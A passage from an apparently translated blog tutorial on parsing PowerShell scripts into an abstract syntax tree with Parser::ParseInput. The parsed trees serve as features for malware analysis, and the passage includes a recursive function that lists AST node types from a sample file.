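Note that parsing PS files with the code above may raise the following error, and a long search turned up no ready-made fix:

Unexpected token in expression or statement
CategoryInfo : NotSpecified: ( : ) [], MethodInvocationException

The cause turned out to be that Create parses the PowerShell code and only creates the scriptblock if the code has no syntax errors. The following alternative is used instead: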

https://stackoverflow.com/questions/39909021/parsing-powershell-script-with-ast

$code = [Management.Automation.Language.Parser]::ParseInput($content, [ref]$tokens, [ref]$errors)
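
The difference between the two calls can be checked on a deliberately broken snippet. The sketch below is illustrative only: the broken input and the variable names ($broken, $createFailed) are assumptions for this example.

```powershell
# Hypothetical broken input: the string and the if-block are never closed.
$broken = 'if ($true) { "unterminated'

# [ScriptBlock]::Create() throws as soon as the code has a syntax error.
$createFailed = $false
try {
  $null = [ScriptBlock]::Create($broken)
}
catch {
  $createFailed = $true
}

# ParseInput() still returns an AST and reports the errors separately.
$tokens = $null
$errors = $null
$ast = [System.Management.Automation.Language.Parser]::ParseInput($broken, [ref]$tokens, [ref]$errors)

$createFailed          # whether Create() failed
$ast.GetType().Name    # type of the root node returned by ParseInput()
$errors.Count          # number of syntax errors found
```

For malware samples this matters because obfuscated or truncated scripts are often not syntactically valid, yet the partial AST and tokens can still carry useful features.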

The full code:

function Convert-CodeToAst
{
  param
  (
    [Parameter(Mandatory)]   # mandatory parameter
    [System.String]$str      # path of the ps file to parse
  )

  # hashtable that maps a parent id to its child nodes
  $hierarchy = @{}
  $result = [System.Collections.ArrayList]@()

  # read the ps file; -Raw keeps multi-line scripts as one string
  Write-Output ("file name: {0}" -f ($str))
  $content = Get-Content $str -Raw
  Write-Output $content

  # create the scriptblock
  # error: unexpected token in expression or statement
  # cause: Create requires syntactically valid PowerShell code
  # $code = [ScriptBlock]::Create($content)

  $tokens = $null
  $errors = $null
  $code = [Management.Automation.Language.Parser]::ParseInput($content, [ref]$tokens, [ref]$errors)


  Write-Output $code

  # extract the AST
  $code.FindAll( { $true }, $true) |
  ForEach-Object {
    # take unique object hash as key
    $id = 0;
    if($_.Parent) {
      $id = $_.Parent.GetHashCode()
    }
    Write-Debug('{0}:{1}' -f $_.GetType().Name,$id)

    if ($hierarchy.ContainsKey($id) -eq $false) {
      $hierarchy[$id] = [System.Collections.ArrayList]@()
    }
    $null = $hierarchy[$id].Add($_)
    # add ast object to parent
  }
  
  # walk the tree recursively
  function Visualize-Tree($Id)
  {
    # visit every child of the current node
    $hierarchy[$id] | ForEach-Object {
      # get the id of the current AST object
      $newid = $_.GetHashCode()

      # recurse into its child nodes (if any)
      if ($hierarchy.ContainsKey($newid))
      {
        Visualize-Tree -id $newid
      }
      $null = $result.Add($_.GetType().Name)
    }
  }

  # start the traversal at the AST root object
  Visualize-Tree -id $code.GetHashCode()
  Write-Output $result
  return $result
}

Convert-CodeToAst -str .\data\beacon

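VI. Summary

That concludes this article. I hope it helps.

I. PowerShell Basics
1. High Threat
2. Basic Syntax
3. Bypass
II. powershell.one
1. Concept
2. Accessing the AST
III. Tokenizing PowerShell Scripts
1. The Colorful World of Tokens
2. PSParser Overview
3. Tokenizing PowerShell
IV. Token Extraction Examples
1. Basic Usage
(1) Extracting the AST
(2) Extracting Tokens
(3) Extracting Variable and Command Lists
2. Batch Analysis
3. Extracting the Text of Each Token
V. Automatically Extracting the AST and Tokens of PowerShell Code
VI. Summary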